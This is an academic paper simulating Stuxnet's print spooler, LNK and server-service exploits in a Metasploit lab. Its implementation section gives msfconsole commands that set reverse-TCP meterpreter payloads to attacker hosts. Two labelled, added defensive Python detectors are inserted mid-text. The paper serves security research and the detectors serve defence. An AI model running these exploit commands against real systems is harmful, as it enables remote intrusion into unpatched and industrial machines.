SWAM Stuxnet Worm Analysis in Metasploit

Stuxnet is a sophisticated worm that was first detected in 2010 and targeted industrial control systems in Iran. The paper analyzes three vulnerabilities exploited by Stuxnet using the Metasploit framework: 1) Print spooler vulnerability that allows copying files to restricted directories, 2) LNK shortcut file vulnerability that redirects users to malicious files, 3) Windows server service vulnerability that copies payloads through network shares. The authors simulate the vulnerabilities in Metasploit and show how Stuxnet could lower the pressure in a water plant design by modifying the PLC code.


2011 Frontiers of Information Technology

SWAM: Stuxnet Worm Analysis in Metasploit

Rahat Masood, Um-e-Ghazia, Dr. Zahid Anwar


Department of Computing
School of Electrical Engineering and Computer Science (SEECS)
National University of Science and Technology (NUST)
Islamabad, Pakistan
10msccsmmasood,10msccssghazia,zahid.anwar@seecs.edu.pk

Abstract---Nowadays cyber security is becoming a great challenge. The attacker community is progressing towards making smart and intelligent malware (viruses, worms and rootkits), which conceal their existence and also use administrator rights without the legitimate user's knowledge. The Stuxnet worm is an example of a recent malware, first detected in July 2010; its variants were also detected earlier. It is the first type of worm that affects the normal functionality of industrial control systems (ICS) having programmable logic controllers (PLC), through a PLC rootkit. Its main goal is to modify ICS behavior by changing the code of the PLC and making it behave in the way the attacker wants. It is a complex piece of malware with different operations and functionalities, which are achieved by exploiting zero-day vulnerabilities. Stuxnet exploits various vulnerable services in Microsoft Windows. In this paper we show a real-time simulation of the first three of these vulnerabilities through Metasploit Framework 3.2 and analyze the results. A real-time scenario is established based on some assumptions. We assumed a Proteus design (pressure sensor) as the PLC and showed, after exploitation, that the pressure value drops to an unacceptable level by changing the Keil code of this design.

Keywords-Stuxnet, Programmable Logic Controllers, Print Spooler, Backtrack, Metasploit Framework

I. BACKGROUND

Stuxnet is one of the most sophisticated recent worms to hit the cyber world, in July 2010. It hit Iranian nuclear facilities. The Senior Director of Security Response at Symantec reported that Iran is the country that suffered most (about 60%) from this worm. Common predictions are that this worm targets either the Bushehr nuclear power plant or the Natanz nuclear facility in Iran [7].

Computer security experts in Iran are convinced that Stuxnet mainly targets the uranium facility at Natanz, where it affects centrifuge speed: the rotational speed first increases, then drops, to introduce distortions and disturb normal behavior. One assumption is that 10% of the centrifuges in Natanz were affected by this worm from 2009 to 2010. This evidence indicates that it is one of the first worms designed by nation states [7].

There are two main phases of the Stuxnet worm: the first is the "propagation phase", which is characteristic of every worm, and the second is the "injection phase". In the first phase, Stuxnet propagates in the local area network and updates its files through peer-to-peer communication. In the second phase, when it finds its actual target, i.e. the Siemens WinCC control and monitoring system connected to the PLC, it starts functioning and deviates the PLCs from their normal behavior. WinCC is a tool developed by Siemens to control the operation and working of PLCs.

We have simulated three vulnerabilities of the Stuxnet worm through the Metasploit framework. It is an open-source hacking framework written in the Ruby language. It is used to exploit, execute and write code for vulnerabilities, and can also be used to configure built-in exploits and their payloads for analysis. It includes other hacking tools for penetration testing, password cracking and much more.

II. INTRODUCTION

Stuxnet contains user-level as well as kernel-level rootkits that hide its existence and gain root-level privileges. Stuxnet can spread through the following ways:
• Removable drive
• Network shares
• RPC Vulnerability
• Print Spooler Vulnerability

A removable drive infected with the Stuxnet worm contains six malicious files, four shortcuts and two payloads:
Copy of Shortcut to.lnk
Copy of Copy of Shortcut to.lnk
Copy of Copy of Copy of Shortcut to.lnk
Copy of Copy of Copy of Copy of Shortcut to.lnk
~WTR4141.TMP
~WTR4132.TMP

The first four shortcut files relate to different operating systems: the first .lnk file executes on Windows 7 but not on Windows XP, the second on Windows Vista, and the last two on Windows XP, Windows Server 2003 and Windows 2000. After finding the corresponding operating system, the .lnk file in turn executes the two .tmp temporary files, which are the actual payloads of Stuxnet.

Stuxnet exploits the MS08-067 Microsoft Windows Server Service vulnerability, in which the malicious payload is copied and executed through shared credentials on the network. Stuxnet enumerates user and admin account information through either Windows Management Instrumentation (WMI) or a scheduled job. After enumerating account details, Stuxnet copies the malicious file under a random file name into the shared folder

978-0-7695-4625-4/11 $26.00 © 2011 IEEE 142


DOI 10.1109/FIT.2011.34

Authorized licensed use limited to: Yildirim Beyazit Univ. Downloaded on October 10,2021 at 17:12:36 UTC from IEEE Xplore. Restrictions apply.
and the next jobs are scheduled according to it. In the case of WMI, instead of user credentials, the explorer.exe file is used for copying.

The second vulnerability used by the Stuxnet worm is the MS10-061 Print Spooler vulnerability. Any system that shares print rights on a network is vulnerable to it. It allows a remote user to copy files into the %SYSTEM% directory, to which that user has no access. Exploitation in this case comprises two phases: an injection phase and an execution phase. The injection phase involves copying "winsta.exe" and "sysnullevnt.mof" into the Windows %SYSTEM% directory; the spooler impersonates the client that sends the two files for printing. The execution phase involves triggering these two copied files: as file execution is automatic, "sysnullevnt.mof", in Managed Object Format, calls "winsta.exe".

MS10-046, the Microsoft Windows .LNK/.PIF vulnerability, concerns how shortcut icons of files are displayed in Windows. These icons are loaded from a CPL (Windows Control Panel) file by calling the function LoadLibraryW(). Stuxnet changes the "File location info" field in the .LNK header. In this way the user is redirected to a malicious path, and the attacker gains access to the system when the user opens Internet Explorer and that specific path. This path is that of a malicious DLL, which actually changes the PLC programming in ICSs.

We have simulated the above three vulnerabilities using Metasploit Framework 3.5 integrated with Linux Backtrack 4. The Metasploit Framework is a platform used by security professionals and researchers for performing penetration testing, exploiting vulnerabilities and writing new exploits, and also for verifying patch installation. Backtrack is a flavor of Linux designed particularly for security professionals, for performing assessments in a purely native environment dedicated to network security. To show the changes in PLC programming we have used a Proteus design of a pressure sensor and, through meterpreter, uploaded a malicious file which affects the output of this sensor.

The paper proceeds in the following manner: Section III describes related work, Section IV gives the architectural view of our project, Section V presents the implementation phase and attack scenario, Section VI shows evaluation results and Section VII the conclusion and future work.

III. RELATED WORK

As Stuxnet is a recent malware, there are no proper research papers related to it, so we studied reports, documents, detailed survey papers and articles related to it.

Symantec Security Response made a detailed report on the analysis of the Stuxnet worm. The main features of Stuxnet, its infection ratio throughout the world, propagation methods, exports and exploits are discussed in this report. It explains the complete history of Stuxnet before it actually hit the Iranian nuclear industry. The Stuxnet architecture, its rootkit functionality, and the general working of WinCC computers connected to PLCs are discussed. There is also complete information related to the AutoRun.Inf file which was present in an older version of Stuxnet. The general behavior of Siemens software and how Stuxnet affects Step 7 project files are explained [1].

Eset made another detailed report. In this report, first of all a comparison is made between Stuxnet and Aurora in terms of exploitation vector and targeted malicious program. Different characteristics of both attacks are discussed: payload, code packing, code obfuscation, establishing a backdoor, communications protocol, update mechanism and multiple distribution vectors. Timelines of different important events related to Stuxnet are given. Two privilege escalation exploits, in addition to the three described above, are completely analyzed: their general behavior, the payloads they execute and their functioning within Stuxnet are revealed. Microsoft patches for these exploits are also explained. The Stuxnet implementation is given in terms of user-mode and kernel-mode functionality. The architecture of the Stuxnet RPC server and the criteria for stealing digital certificates by Stuxnet are given [2].

One more article on Stuxnet discusses its analysis and history. It has two parts: Part I contains an examination of the Stuxnet worm and Part II a technical analysis of this worm. Part I gives a detailed history of Stuxnet, different views related to it, and news and information from different countries. Part II contains technical details: exploitation of vulnerabilities, malware installation, command and control server operation, RPC server installation, infection of the WinCC environment and detection of SCADA systems are discussed. To conclude this part, short questions and answers related to Stuxnet from the F-Secure laboratory are given. After this there is a complete discussion of the elevation-of-privilege vulnerability "keyboard layout MS10-073", used by Stuxnet under Windows 2000 and XP, and of how the associated proof of concept is developed. At the end of this article the top ten hacking techniques of the year 2010 are given [3].

Another detailed paper, written under the supervision of the Fraunhofer Institute for Secure Information Technology, mainly discusses the impact of the Stuxnet malware on industrial control systems. Some prevention mechanisms and procedures are also discussed, such as isolation of industrial control systems, security awareness, staff education, event monitoring and maintaining compliance through a long system life [4].

For help with the Metasploit Framework we consulted the fourth and fifth chapters of "Gray Hat Hacking: The Ethical Hacker's Handbook". In these chapters links are given for Metasploit Framework installation, and a step-by-step procedure and commands are given for exploiting and configuring a particular vulnerability through the Metasploit console interface. A brief introduction to meterpreter (a Metasploit payload) is given: it does not create any additional process on the victim's machine but injects itself into process memory. Other uses of the Metasploit Framework besides exploitation are given: using Metasploit as a man-in-the-middle password stealer, Metasploit as a malicious SMB (Server Message Block) server, and using Metasploit to auto-attack [5].

IV. ARCHITECTURE

We simulated the three main vulnerabilities that Stuxnet exploits. The architectural diagram of our project is shown in Figure 1. Here the C&C server is Backtrack 4 and the Metasploit Framework acts as the USB. The user issues commands


via Metasploit to the PCs (1, 2, 3, 4 and 5) connected in the LAN. First, the Server Service vulnerability is exploited on PC 1, which contains a shared folder. Any other PC on the LAN that accesses this shared folder gets infected with the worm. The second vulnerability is exploited through the print server: PCs on the LAN that send a print request to the server get affected. For the second phase, another LAN is created between the C&C and PC 6. PC 6 contains the Keil and Proteus software. When the C&C server issues commands, the code of our project (Pressure Sensor) in Keil changes and, as a result, the circuit diagram in Proteus gives an alert when run.

The environment of our project is best described by Figure 2. Different virtual machines, i.e. one Linux and three Windows XP, are used in our project.

The Metasploit Framework is an important tool in our project that is used to exploit the Windows vulnerabilities. Each of the three vulnerabilities has its own functionality and is executed differently from the others. The steps that we follow in order to execute these exploits are explained via flowcharts.

A. MS08_067_netapi (Server Service)

The Stuxnet worm is capable of spreading itself through network shares, i.e. shared folders. Simulation of this vulnerability through the Metasploit framework is demonstrated in Figure 3.

Figure 1: Architecture of SWAM

B. MS10_061_spoolss (Print Spooler Server)

This vulnerability is also used to propagate the worm via the LAN, but its main target is the print server. In our simulation, we installed a print server on one of the XP machines and show the propagation of dummy exe files on the LAN. The flow diagram of implementing this vulnerability is shown in Figure 4.

Figure 2: Hierarchy of Stuxnet Simulation Tools

C. MS10_046_dllloader (.LNK Vulnerability)

This is the first way in which the Stuxnet rootkit distributes itself. We exploit this vulnerability on a Windows system containing Keil and Proteus. Our dummy exe "plc.exe", when uploaded and executed on the PLC-based machine, changes the content of the Keil file and, as a result, the pressure-sensor circuit designed in Proteus changes its output: it gives an alert signal, i.e. the pressure becomes too low. Figure 1 gives a clear overview.

Figure 3: Flow Diagram of Server Service Vulnerability
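Section II and subsection C above describe the .LNK vector in terms of the shortcut's "File location info" field being redirected to a library file. The following is an added example, not code from the paper, showing what a defender-side triage script for that field looks like: it builds two constructed Shell Link (.LNK) files in memory (a normal Internet Explorer shortcut and one whose location info points at a library on a removable drive), parses the ShellLinkHeader, the LinkInfo block and the IconLocation string by the MS-SHLLINK layout, and applies a deliberately simple rule (target or out-of-system icon source ends in .dll/.cpl). The sample paths, the rule and the helper names (`build_lnk`, `parse_lnk`, `is_suspicious`, `scan`) are this example's assumptions; the rule is a triage aid, not a complete detector for the MS10-046 case, which also involves the ItemIDList that this parser only skips.

```python
import struct

# Shell Link (.LNK) layout per the MS-SHLLINK format; shared by the
# constructed-sample builder and the parser below.
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
HEADER_FMT = "<I16sIIQQQIIIHHII"   # 76-byte ShellLinkHeader
LINK_INFO_HDR_FMT = "<IIIIIII"      # 28-byte LinkInfo header
LIBRARY_EXTS = (".dll", ".cpl")
SYSTEM_PREFIXES = ("%systemroot%", "c:\\windows")


def build_lnk(local_base_path, icon_location=None):
    """Construct a minimal .LNK: header, a LinkInfo block (the paper's
    "File location info") with a local base path, and an optional
    IconLocation string. Constructed sample data, not a real shortcut."""
    flags = HAS_LINK_INFO | IS_UNICODE
    if icon_location is not None:
        flags |= HAS_ICON_LOCATION
    header = struct.pack(HEADER_FMT, 0x4C, SHELL_LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    # VolumeID: size 17, DRIVE_FIXED, serial 0, empty label at offset 16
    volume_id = struct.pack("<IIII", 17, 3, 0, 16) + b"\x00"
    base = local_base_path.encode("cp1252") + b"\x00"
    suffix = b"\x00"                                   # empty CommonPathSuffix
    hdr = struct.calcsize(LINK_INFO_HDR_FMT)
    vol_off, base_off = hdr, hdr + len(volume_id)
    suf_off = base_off + len(base)
    total = suf_off + len(suffix)
    link_info = struct.pack(LINK_INFO_HDR_FMT, total, hdr, 0x1,  # VolumeIDAndLocalBasePath
                            vol_off, base_off, 0, suf_off) + volume_id + base + suffix
    string_data = b""
    if icon_location is not None:
        string_data = struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")
    return header + link_info + string_data


def _read_cstr(data, off):
    return data[off:data.index(b"\x00", off)].decode("cp1252")


def parse_lnk(data):
    """Read the header, the LinkInfo local base path and the StringData."""
    fields = struct.unpack_from(HEADER_FMT, data, 0)
    if fields[0] != 0x4C or fields[1] != SHELL_LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = fields[2]
    pos = struct.calcsize(HEADER_FMT)
    info = {"flags": flags, "local_base_path": None, "icon_location": None}
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the ItemIDList if present
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, _vol, base_off, _net, _suf = \
            struct.unpack_from(LINK_INFO_HDR_FMT, data, pos)
        if li_flags & 0x1:
            info["local_base_path"] = _read_cstr(data, pos + base_off)
        pos += li_size
    width = 2 if flags & IS_UNICODE else 1
    for bit in (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR,
                HAS_ARGUMENTS, HAS_ICON_LOCATION):    # fixed StringData order
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, pos)
            raw = data[pos + 2:pos + 2 + count * width]
            pos += 2 + len(raw)
            if bit == HAS_ICON_LOCATION:
                info["icon_location"] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return info


def is_suspicious(info):
    """Triage rule (an assumption of this example): the link target itself
    is a library, or the icon is loaded from a library outside Windows."""
    target = (info["local_base_path"] or "").lower()
    icon = (info["icon_location"] or "").lower()
    if target.endswith(LIBRARY_EXTS):
        return True
    return icon.endswith(LIBRARY_EXTS) and not icon.startswith(SYSTEM_PREFIXES)


# Constructed samples: an ordinary Internet Explorer shortcut, and one whose
# file location info points at a library on a removable drive.
SAMPLES = {
    "benign_ie.lnk": build_lnk(r"C:\Program Files\Internet Explorer\iexplore.exe",
                               r"%SystemRoot%\system32\SHELL32.dll"),
    "removable_dll.lnk": build_lnk(r"E:\constructed_sample.dll",
                                   r"E:\constructed_sample.dll"),
}


def scan(samples):
    """Return {name: (local_base_path, suspicious)} for each sample."""
    out = {}
    for name, data in samples.items():
        info = parse_lnk(data)
        out[name] = (info["local_base_path"], is_suspicious(info))
    return out


if __name__ == "__main__":
    for name, (target, bad) in scan(SAMPLES).items():
        print(f"{name}: target={target!r} suspicious={bad}")
```

On a real host the same parser would be fed the bytes of each .LNK found on removable media before they are opened; the icon-source rule deliberately whitelists the Windows directory because legitimate shortcuts routinely take their icon from SHELL32.dll, so only the library-outside-Windows case is raised.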


Figure 4: Flow Diagram of Print Spooler Vulnerability

Figure 5: Flow Diagram of .LNK Vulnerability

V. IMPLEMENTATION

In our project, we mainly focus on the three main exploits that Stuxnet uses to exploit industrial Windows-based systems. We use virtual machines to carry out the simulations. For this, three Windows XP SP2 machines and one Backtrack machine are installed on VirtualBox. We performed all our simulation in a virtual environment. We connect all of these machines with a network; all of them have different IP addresses.

As mentioned above, we have used the Metasploit framework to exploit the three main vulnerabilities that Stuxnet uses. We have used the console interface of the Metasploit framework, called msfcli.

Stuxnet exploits four zero-day vulnerabilities plus one patched vulnerability. We have simulated exploitation of two zero-day and one patched vulnerability. The working of these exploits is discussed below.

A. Server Service (ms08_067)

The MS08_067 vulnerability is already patched by Microsoft; it allows arbitrary code execution from SMB clients sending specially crafted (malformed) path strings. W32.Stuxnet uses this vulnerability to replicate itself to unpatched remote PCs on the LAN after verifying their patch status. We used this vulnerability to get access to network shares, such as shared folders on the LAN, and when any machine on the LAN accesses this folder, the Stuxnet files get copied to that machine and hide themselves.

Stuxnet initially propagates through a USB drive, but in our scenario we consider the Metasploit framework as the USB that exploits the vulnerabilities. Configurations (setting parameter values) are performed before exploitation. The important parameters are:
• PAYLOAD
• Local Host (LHOST)
• Remote Host (RHOST)
• Exploit name

PAYLOAD is the code that an attacker wants to execute on a target machine, LHOST contains the IP address of the source machine (e.g. the attacker machine), RHOST is the victim IP address, and with the use command the name of the exploit is given. Once the vulnerability is exploited, a meterpreter session is opened that allows the attacker (the Metasploit framework user) to execute or insert any malicious data on the victim PC. In order to show that our Stuxnet works like the real Stuxnet, we have implemented our own dummy Stuxnet code in C#. These are the main commands that are used in almost every exploit:

1 msf > use exploit/windows/smb/ms08_067_netapi
2 msf exploit(ms08_067_netapi) > show payloads
3 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
4 msf exploit(ms08_067_netapi) > set LHOST [Attacker IP Address]
5 msf exploit(ms08_067_netapi) > set RHOST [Victim IP Address]
6 msf exploit(ms08_067_netapi) > exploit

Line 1 gives the name of the exploit that we want to use, e.g. ms08_067_netapi. Line 2 gives a complete list of the payloads that can be used with the particular exploit. The set command on line 3 is used to select the payload. Similarly, the set commands on lines 4 and 5 set the IP address of the attacker and the IP address of the victim. The exploit command on line 6 is the last command, which finally runs the exploit.

After entering the above commands, a meterpreter session is opened; we then inserted our exe named "Stuxnet.exe" into the shared folder on the LAN. This exe is written in C#; when executed by any other computer on the LAN it copies and hides itself. Thus one of the characteristics of Stuxnet, propagation via network shares, is shown through this exploitation and exe. It propagates itself when any PC on the LAN accesses the shared folder containing the exe. For the results of these commands see Appendix B.

B. Print Spooler (MS10-061)

Another way in which Stuxnet replicates itself over the network is by exploiting the vulnerability in the Windows Print Spooler (MS10-061). This vulnerability results in privilege escalation, allowing a remote user using a Guest account to write into the %SYSTEM% directory of the target machine. The worm copies additional files into Windows\System32\winsta.exe and Windows\System32\wbem\mof\sysnullevnt.mof


respectively.

For our scenario, the Metasploit framework exploit ms10_061_spoolss is used. Using the same initial commands as given above, this vulnerability is exploited on the machine containing the print server.

1 msf > use exploit/windows/smb/ms10_061_spoolss
2 msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/reverse_tcp
3 msf exploit(ms10_061_spoolss) > set RHOST 192.168.1.3
4 msf exploit(ms10_061_spoolss) > set LHOST 192.168.1.50
5 msf exploit(ms10_061_spoolss) > set PNAME 2500C Series PCL5Ce
6 msf exploit(ms10_061_spoolss) > exploit

C. .LNK Vulnerability (MS10_046)

From the name it is clear that this vulnerability exploits shortcut files having the extension .LNK. As shortcut files point to the original location of a resource, Stuxnet uses this functionality to redirect shortcut files to its malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload. Similar to the above two exploits, commands are given from the Metasploit framework in order to exploit this vulnerability. Once exploited, the attacker only waits for the victim to open any shortcut file. When a shortcut file is opened, a meterpreter session starts at the attacker side that allows the attacker to execute or insert any malicious content on the victim computer.

The .LNK vulnerability mainly spreads through USB, so we used this exploit on the machine containing the PLC controlling the ICS. We have used the Keil and Proteus software as the PLC. Through meterpreter, the attacker inserts another exe named "plc.exe" on the victim computer, whose main purpose is to change the Keil code so that the PLC (in our case the pressure sensor circuit) behaves abnormally.

1 msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
2 msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
3 msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.50
4 msf exploit(ms10_046_shortcut_icon_dllloader) > exploit

D. Assumptions

For carrying out the Stuxnet simulation, the following assumptions have been made:
• Stuxnet's initial propagation is through USB; we assumed that the Metasploit framework is the USB and that exploitation takes place through it.
• We have made our own Stuxnet exes named "plc.exe" and "Stuxnet.exe"; the function of one exe is to propagate itself on the LAN and hide itself, while the other exe is used to change the functionality of the PLC.
• The original PLC software is not available, so Keil and Proteus are used to show the functionality of the PLC.

VI. EVALUATION & RESULTS

In the above section we have already described our scenario of simulating the three vulnerabilities. We successfully exploited and simulated these three vulnerabilities. Any industrial Windows-based computer that has these unpatched vulnerabilities can easily be exploited. Table 1 shows the effect of these exploits in our scenario.

MS10_061_spoolss can be avoided if the print server does not allow any exe file to be printed. If the server allows exe files to be printed, then it can only entertain those exe files having a file name of fewer than ten characters. The MS10_046_dllloader exploit can be prevented at the user end, i.e. if the user does not make any shortcut file for Internet Explorer.

We have also uploaded a video tutorial of our framework on YouTube [6].

VII. CONCLUSION & FUTURE WORK

Stuxnet is the first worm that mainly targets ICS using zero-day vulnerabilities. We have simulated the Stuxnet exploits in a limited environment (3 Windows XP SP2 and 1 Linux Backtrack 4 machines); it can propagate much faster in a real industrial environment having a large number of unpatched systems, and cause a lot of damage to heavy machinery.

Stuxnet 1.0 has been mitigated by different anti-virus companies (through signatures), by Microsoft as the vendor (through patching the vulnerabilities) and by using tools available on the internet. A lot of research is being carried out on the analysis of Stuxnet 1.0, as its source code is still not available. The next version of this worm, i.e. Stuxnet 2.0, is also under consideration.

For the current project we have done simulations through dummy malicious Stuxnet exe files; we can extend this work either by analyzing the six Stuxnet files properly or by implementing the pure Stuxnet worm (writing the source code) ourselves.

VIII. REFERENCES

[1] Nicolas Falliere, Liam O Murchu, and Eric Chien, "W32.Stuxnet Dossier", Symantec Security Response, Version 1.4, February 2011.
[2] Aleksandr Matrosov, Eugene Rodionov, David Harley, Juraj Malcho, "Stuxnet Under the Microscope", Revision 1.31, 24 Sep 2010.
[3] David Helan, "Stuxnet: Analysis, Myths and Realities", ACTU SECU 27, XMCO, 2011.
[4] Martin Brunner, Hans Hofinger, Christoph Krauß, Christopher Roblee, Peter Schoo, Sascha Todt, "Infiltrating Critical Infrastructures with Next-Generation Attacks: W32.Stuxnet as a Showcase Threat", Version 1.4, December 17, 2010.
[5] Shon Harris, Allen Harper, Chris Eagle, Jonathan Ness, "Gray Hat Hacking: The Ethical Hacker's Handbook", Second Edition, McGraw-Hill, 2008.


Table 1: Results of our Stuxnet Worm Simulation

Exploit: MS08_067_netapi (Server Service)
Result:
  • The malicious file "Stuxnet.exe" is copied into a folder shared on the LAN
  • When any machine on the LAN uses this file, it is automatically copied onto that machine

Exploit: MS10_061_spoolss (Print Spooler)
Result:
  • A print command containing two random files is sent to the print server
  • These files are copied into the Windows system directory
  • After that, any print command sent to the server automatically copies these two random files into the system directory

Exploit: MS10_046_dllloader (.LNK Vulnerability)
Result:
  • When the target machine opens any shortcut file, a session is established with the attacker machine
  • The malicious "plc.exe" file is uploaded to the victim machine

Exploit: Proteus code
Result:
  • Our assumption is that the plc.exe file specifically targets the PLC machine (having Keil and Proteus). After uploading, it disturbs the normal functionality of the pressure sensor.
  • The value of the pressure drops to zero and the sensor generates an alert

[6] Rahat Masood, "Stuxnet Simulation via Metasploit.wmv", http://www.youtube.com/watch?v=AZNU7bCRvJg
[7] Wikipedia, "Stuxnet", http://en.wikipedia.org/wiki/Stuxnet, October 21, 2011.
[8] Phoonjzc, "Installing BackTrack 4 on Virtual Box with Windows Host", http://www.youtube.com/watch?v=up2OR1M0aUk

IX. APPENDIX A

For simulating the Stuxnet worm, the first and foremost thing that we need is Backtrack 4, which contains the Metasploit framework within it. Running Backtrack 4 inside VirtualBox works well for portable testing needs. [8] provides a tutorial on how to install Backtrack 4 in VirtualBox.
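Sections II and V.B above describe the MS10-061 drop in terms of two artifacts: an executable written into the Windows system directory (winsta.exe) and a Managed Object Format file written into the wbem\mof directory (sysnullevnt.mof) that, because MOF files in that directory are compiled automatically, ends up calling the executable. The following is an added example, not code from the paper, of a defender-side check over those artifacts. It scans a constructed directory listing for MOF files in the auto-compile directory that register a code-executing WMI event consumer, extracts the command they would launch, and then reports any System32 executable that such a command references. The two file paths come from the paper; the MOF bodies, the listing, the consumer classes used as the trigger signal (CommandLineEventConsumer and ActiveScriptEventConsumer) and the function name `scan_listing` are this example's assumptions, and the MOF content in particular is only an assumption of how such a file could invoke winsta.exe, since the paper does not show the real file.

```python
import re

# Drop locations named in the paper for the MS10-061 case: an executable in
# System32 and a MOF file in the WMI auto-compile directory.
SYSTEM32_DIR = r"c:\windows\system32"
MOF_AUTOCOMPILE_DIR = r"c:\windows\system32\wbem\mof"
# WMI event consumers that execute code; a MOF in the auto-compile directory
# that registers one of these runs its command without any user action.
ACTIVE_CONSUMERS = ("CommandLineEventConsumer", "ActiveScriptEventConsumer")
CONSUMER_RE = re.compile(r"instance\s+of\s+(\w+EventConsumer)", re.IGNORECASE)
CMD_RE = re.compile(r'(?:CommandLineTemplate|ExecutablePath)\s*=\s*"((?:[^"\\]|\\.)*)"',
                    re.IGNORECASE)

# Constructed MOF bodies (assumptions of this example, not the real files).
SUSPICIOUS_MOF = r"""
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $Filt
{
    Name = "constructed_filter";
    EventNamespace = "root\\cimv2";
    QueryLanguage = "WQL";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'";
};
instance of CommandLineEventConsumer as $Cons
{
    Name = "constructed_consumer";
    CommandLineTemplate = "C:\\Windows\\System32\\winsta.exe";
};
instance of __FilterToConsumerBinding
{
    Filter = $Filt;
    Consumer = $Cons;
};
"""
BENIGN_MOF = r"""
#pragma namespace("\\\\.\\root\\cimv2")
class Constructed_Example_Class
{
    [key] string Name;
    uint32 Value;
};
"""

# Constructed directory listing: (path, text content, or None for binaries).
SAMPLE_FILES = [
    (r"C:\Windows\System32\wbem\mof\sysnullevnt.mof", SUSPICIOUS_MOF),
    (r"C:\Windows\System32\wbem\mof\vendor_schema.mof", BENIGN_MOF),
    (r"C:\Windows\System32\winsta.exe", None),
    (r"C:\Windows\System32\calc.exe", None),
]


def scan_listing(files):
    """Flag MOFs in the auto-compile directory that register an active
    consumer, then every System32 executable those consumers launch."""
    findings, commands = [], []
    for path, content in files:
        directory, _, name = path.lower().rpartition("\\")
        if directory != MOF_AUTOCOMPILE_DIR or not name.endswith(".mof"):
            continue
        found = {c.lower() for c in CONSUMER_RE.findall(content or "")}
        active = [c for c in ACTIVE_CONSUMERS if c.lower() in found]
        if not active:
            continue
        # MOF string literals escape backslashes; unescape them for path matching
        cmds = [m.group(1).replace("\\\\", "\\") for m in CMD_RE.finditer(content)]
        findings.append({"path": path, "commands": cmds,
                         "reason": "MOF in auto-compile directory registers " + ", ".join(active)})
        commands.extend(c.lower() for c in cmds)
    for path, _ in files:
        low = path.lower()
        if (low.startswith(SYSTEM32_DIR + "\\") and low.endswith(".exe")
                and any(low in c for c in commands)):
            findings.append({"path": path, "commands": [],
                             "reason": "executable launched by a flagged MOF consumer"})
    return findings


if __name__ == "__main__":
    for f in scan_listing(SAMPLE_FILES):
        print(f"{f['path']}: {f['reason']} {f['commands']}")
```

The correlation step is the useful part: an unexpected executable in System32 is hard to judge on its own, but one that is referenced from a freshly auto-compiled event subscription is exactly the pairing the paper describes, so the two artifacts are reported together. On a live host the listing would come from walking the two directories (and, for the print-spooler case, from the spooler's own write timestamps), which this offline example replaces with constructed entries.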


